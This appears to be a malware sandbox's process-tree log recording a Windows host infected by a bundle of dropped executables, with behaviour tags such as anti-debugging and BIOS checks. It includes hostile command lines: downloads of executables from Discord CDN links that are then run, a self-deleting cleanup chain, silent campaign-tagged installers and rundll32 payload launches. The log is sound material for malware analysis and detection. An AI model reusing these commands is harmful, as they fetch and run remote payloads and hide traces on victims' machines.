C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\14es1gqk.zxw\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\14es1gqk.zxw\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634168960 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵PID:6232
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oznsddlb.mp5\any.exe & exit8⤵PID:6988
-
C:\Users\Admin\AppData\Local\Temp\oznsddlb.mp5\any.exeC:\Users\Admin\AppData\Local\Temp\oznsddlb.mp5\any.exe9⤵PID:6496
-
C:\Users\Admin\AppData\Local\Temp\oznsddlb.mp5\any.exe"C:\Users\Admin\AppData\Local\Temp\oznsddlb.mp5\any.exe" -u10⤵PID:6760
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3i4gul1l.tmo\rtst1045.exe & exit8⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\3i4gul1l.tmo\rtst1045.exeC:\Users\Admin\AppData\Local\Temp\3i4gul1l.tmo\rtst1045.exe9⤵PID:5716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pvtp3dvk.vnp\gcleaner.exe /mixfive & exit8⤵PID:5160
-
C:\Users\Admin\AppData\Local\Temp\pvtp3dvk.vnp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\pvtp3dvk.vnp\gcleaner.exe /mixfive9⤵PID:4136
-
C:\Users\Admin\AppData\Local\Temp\pvtp3dvk.vnp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\pvtp3dvk.vnp\gcleaner.exe /mixfive10⤵PID:6080
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\inkzwexo.yrc\autosubplayer.exe /S & exit8⤵PID:4980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zr3aadyp.bzf\installer.exe /qn CAMPAIGN=654 & exit8⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\zr3aadyp.bzf\installer.exeC:\Users\Admin\AppData\Local\Temp\zr3aadyp.bzf\installer.exe /qn CAMPAIGN=6549⤵PID:6784
-
-
-
-
C:\Program Files\Windows Defender Advanced Threat Protection\XFGQCCTTOK\foldershare.exe"C:\Program Files\Windows Defender Advanced Threat Protection\XFGQCCTTOK\foldershare.exe" /VERYSILENT7⤵PID:5396
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\rUQzU8dGdOkZUN9QdHOtgEPw.exe"C:\Users\Admin\Pictures\Adobe Films\rUQzU8dGdOkZUN9QdHOtgEPw.exe"4⤵PID:4900
-
C:\Users\Admin\Pictures\Adobe Films\rUQzU8dGdOkZUN9QdHOtgEPw.exe"C:\Users\Admin\Pictures\Adobe Films\rUQzU8dGdOkZUN9QdHOtgEPw.exe" -u5⤵PID:3640
-
-
-
C:\Users\Admin\Pictures\Adobe Films\a5fd8PV6jg7cJ2ynvQgXPvjV.exe"C:\Users\Admin\Pictures\Adobe Films\a5fd8PV6jg7cJ2ynvQgXPvjV.exe"4⤵
- Executes dropped EXE
PID:3424
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZmGwCijz_aF6kekXlZOAQ8Bm.exe"C:\Users\Admin\Pictures\Adobe Films\ZmGwCijz_aF6kekXlZOAQ8Bm.exe"2⤵
- Executes dropped EXE
PID:1572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im ZmGwCijz_aF6kekXlZOAQ8Bm.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ZmGwCijz_aF6kekXlZOAQ8Bm.exe" & del C:\ProgramData\*.dll & exit3⤵PID:344
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ZmGwCijz_aF6kekXlZOAQ8Bm.exe /f4⤵
- Kills process with taskkill
PID:932
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:1048
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IPkZZkIpJIP4h4aZO88aFQU8.exe"C:\Users\Admin\Pictures\Adobe Films\IPkZZkIpJIP4h4aZO88aFQU8.exe"2⤵
- Executes dropped EXE
PID:2256 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\925B.bat "C:\Users\Admin\Pictures\Adobe Films\IPkZZkIpJIP4h4aZO88aFQU8.exe""3⤵PID:3112
-
C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""4⤵PID:4508
-
-
C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828711157309470/18.exe" "18.exe" "" "" "" "" "" ""4⤵PID:1496
-
-
C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/910827251535314946/910828757600858142/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""4⤵PID:3880
-
-
C:\Users\Admin\AppData\Local\Temp\5300\18.exe18.exe4⤵PID:4264
-
-
C:\Users\Admin\AppData\Local\Temp\5300\Transmissibility.exeTransmissibility.exe4⤵PID:2204
-
-
C:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\9249.tmp\925A.tmp\extd.exe "" "" "" "" "" "" "" "" ""4⤵PID:3880
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\D2iekO3L2Z2yXRah6Fyyo_Tq.exe"C:\Users\Admin\Pictures\Adobe Films\D2iekO3L2Z2yXRah6Fyyo_Tq.exe"2⤵
- Executes dropped EXE
PID:2236 -
C:\Users\Admin\Pictures\Adobe Films\D2iekO3L2Z2yXRah6Fyyo_Tq.exe"C:\Users\Admin\Pictures\Adobe Films\D2iekO3L2Z2yXRah6Fyyo_Tq.exe"3⤵PID:4596
-
-
-
C:\Users\Admin\Pictures\Adobe Films\aWO3kyDWUY6qOk8aw7dUT6ep.exe"C:\Users\Admin\Pictures\Adobe Films\aWO3kyDWUY6qOk8aw7dUT6ep.exe"2⤵
- Executes dropped EXE
PID:3880
-
-
C:\Users\Admin\Pictures\Adobe Films\PB2I64qARSFDtYJ3nobcBQFo.exe"C:\Users\Admin\Pictures\Adobe Films\PB2I64qARSFDtYJ3nobcBQFo.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:804 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:3844
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:4976
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QV0IFeEZkl3FCtLgF98mEOh9.exe"C:\Users\Admin\Pictures\Adobe Films\QV0IFeEZkl3FCtLgF98mEOh9.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:60
-
-
C:\Users\Admin\Pictures\Adobe Films\3fzJvJsNxh3XgOwzydSsFjvG.exe"C:\Users\Admin\Pictures\Adobe Films\3fzJvJsNxh3XgOwzydSsFjvG.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1868
-
-
C:\Users\Admin\Pictures\Adobe Films\jjJwr9ifpZzN9Q81BgUEgmtM.exe"C:\Users\Admin\Pictures\Adobe Films\jjJwr9ifpZzN9Q81BgUEgmtM.exe"2⤵
- Executes dropped EXE
PID:1280 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1280 -s 4003⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3404
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Di68BgTKfVJrtOniWjpuFeoP.exe"C:\Users\Admin\Pictures\Adobe Films\Di68BgTKfVJrtOniWjpuFeoP.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2284
-
-
C:\Users\Admin\Pictures\Adobe Films\gf4yL6i5_1EnGcL45rapBi4N.exe"C:\Users\Admin\Pictures\Adobe Films\gf4yL6i5_1EnGcL45rapBi4N.exe"2⤵
- Executes dropped EXE
PID:348
-
-
C:\Users\Admin\Pictures\Adobe Films\tk0pJOIVedvbbDoftQOGUQGr.exe"C:\Users\Admin\Pictures\Adobe Films\tk0pJOIVedvbbDoftQOGUQGr.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1752
-
-
C:\Users\Admin\Pictures\Adobe Films\2FwGPMS0DwsAJmJt30kqxVWa.exe"C:\Users\Admin\Pictures\Adobe Films\2FwGPMS0DwsAJmJt30kqxVWa.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:1216 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:1724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 5483⤵
- Program crash
PID:4184
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TCmEOe83n5q_zlXj1ichAwHp.exe"C:\Users\Admin\Pictures\Adobe Films\TCmEOe83n5q_zlXj1ichAwHp.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3196
-
-
C:\Users\Admin\Pictures\Adobe Films\ZOfaCe2gP2ntE8UsdnOMtkcn.exe"C:\Users\Admin\Pictures\Adobe Films\ZOfaCe2gP2ntE8UsdnOMtkcn.exe"2⤵
- Executes dropped EXE
PID:2600
-
-
C:\Users\Admin\Pictures\Adobe Films\7IMHR70sE01sKpdv3ItQAxCA.exe"C:\Users\Admin\Pictures\Adobe Films\7IMHR70sE01sKpdv3ItQAxCA.exe"2⤵PID:360
-
C:\Users\Admin\Pictures\Adobe Films\7IMHR70sE01sKpdv3ItQAxCA.exe"C:\Users\Admin\Pictures\Adobe Films\7IMHR70sE01sKpdv3ItQAxCA.exe"3⤵
- Executes dropped EXE
PID:1260
-
-
-
C:\Users\Admin\Pictures\Adobe Films\n7IoPyl0GofJiCvMJ26_RxWk.exe"C:\Users\Admin\Pictures\Adobe Films\n7IoPyl0GofJiCvMJ26_RxWk.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:2352 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 5603⤵
- Program crash
PID:4208
-
-
-
C:\Users\Admin\Pictures\Adobe Films\L9S67PdEwQEN8zxKqmVrVq_C.exe"C:\Users\Admin\Pictures\Adobe Films\L9S67PdEwQEN8zxKqmVrVq_C.exe"2⤵
- Executes dropped EXE
PID:600
-
-
C:\Users\Admin\Pictures\Adobe Films\GnYY58_zNkV7iYJyGcEVYFxH.exe"C:\Users\Admin\Pictures\Adobe Films\GnYY58_zNkV7iYJyGcEVYFxH.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:596 -
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"3⤵PID:3424
-
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"3⤵
- Executes dropped EXE
PID:900
-
-
C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"3⤵
- Executes dropped EXE
PID:2216
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uw3x5UZ_x4Ps_eaCOFD55IW_.exe"C:\Users\Admin\Pictures\Adobe Films\uw3x5UZ_x4Ps_eaCOFD55IW_.exe"2⤵
- Executes dropped EXE
PID:1072
-
-
C:\Users\Admin\Pictures\Adobe Films\JkEAwDR9eFf1IiksFz8QTw_O.exe"C:\Users\Admin\Pictures\Adobe Films\JkEAwDR9eFf1IiksFz8QTw_O.exe"2⤵
- Executes dropped EXE
PID:1060
-
-
C:\Users\Admin\Pictures\Adobe Films\e1CrrXCkZ8t_nyzdNUuoLNt_.exe"C:\Users\Admin\Pictures\Adobe Films\e1CrrXCkZ8t_nyzdNUuoLNt_.exe"2⤵
- Executes dropped EXE
PID:1488 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 6603⤵
- Program crash
PID:1256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 7123⤵
- Program crash
PID:4376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 6683⤵
- Program crash
PID:4664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 6643⤵
- Program crash
PID:4908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 11643⤵
- Program crash
PID:3440
-
-
-
C:\Users\Admin\Pictures\Adobe Films\8u0oitmhgevh1MzSaqj9ppEe.exe"C:\Users\Admin\Pictures\Adobe Films\8u0oitmhgevh1MzSaqj9ppEe.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1364
-
-
C:\Users\Admin\Pictures\Adobe Films\IHQCcHHYLfinJ7eO1FtmjmkC.exe"C:\Users\Admin\Pictures\Adobe Films\IHQCcHHYLfinJ7eO1FtmjmkC.exe"2⤵PID:4480
-
C:\Users\Admin\AppData\Local\Temp\is-U6KA1.tmp\IHQCcHHYLfinJ7eO1FtmjmkC.tmp"C:\Users\Admin\AppData\Local\Temp\is-U6KA1.tmp\IHQCcHHYLfinJ7eO1FtmjmkC.tmp" /SL5="$80054,506127,422400,C:\Users\Admin\Pictures\Adobe Films\IHQCcHHYLfinJ7eO1FtmjmkC.exe"3⤵PID:4336
-
C:\Users\Admin\AppData\Local\Temp\is-8JU4R.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-8JU4R.tmp\lakazet.exe" /S /UID=27094⤵PID:4816
-
C:\Users\Admin\AppData\Local\Temp\ce-83069-2f1-a0cab-ddf046497ebdc\Laejataniko.exe"C:\Users\Admin\AppData\Local\Temp\ce-83069-2f1-a0cab-ddf046497ebdc\Laejataniko.exe"5⤵PID:856
-
-
C:\Users\Admin\AppData\Local\Temp\4f-23380-0f2-2b189-aaa2378e92525\Qequhaqoga.exe"C:\Users\Admin\AppData\Local\Temp\4f-23380-0f2-2b189-aaa2378e92525\Qequhaqoga.exe"5⤵PID:2944
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xcsgjjvt.xgw\vinmall_da.exe /silent & exit6⤵PID:6184
-
C:\Users\Admin\AppData\Local\Temp\xcsgjjvt.xgw\vinmall_da.exeC:\Users\Admin\AppData\Local\Temp\xcsgjjvt.xgw\vinmall_da.exe /silent7⤵PID:6720
-
-
-
-
C:\Program Files\Windows NT\QMFAFXAOFB\foldershare.exe"C:\Program Files\Windows NT\QMFAFXAOFB\foldershare.exe" /VERYSILENT5⤵PID:5236
-
-
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:360
-
C:\Users\Admin\AppData\Local\Temp\5FAB.exeC:\Users\Admin\AppData\Local\Temp\5FAB.exe1⤵PID:3148
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵PID:5220
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4336 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4480
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5044
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5988
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7132
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6972
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:7144
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 60B5E07FC3908615AC0A48170D3DBFD6 C2⤵PID:5744
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0F27FA0CADE3BEDA3D89B13783D58CB62⤵PID:6484
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:5860
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6832
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:7020 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1352
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6456
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{3544a670-8092-464f-8b44-182de9d5cc5e}\oemvista.inf" "9" "4d14a44ff" "000000000000016C" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:4072
-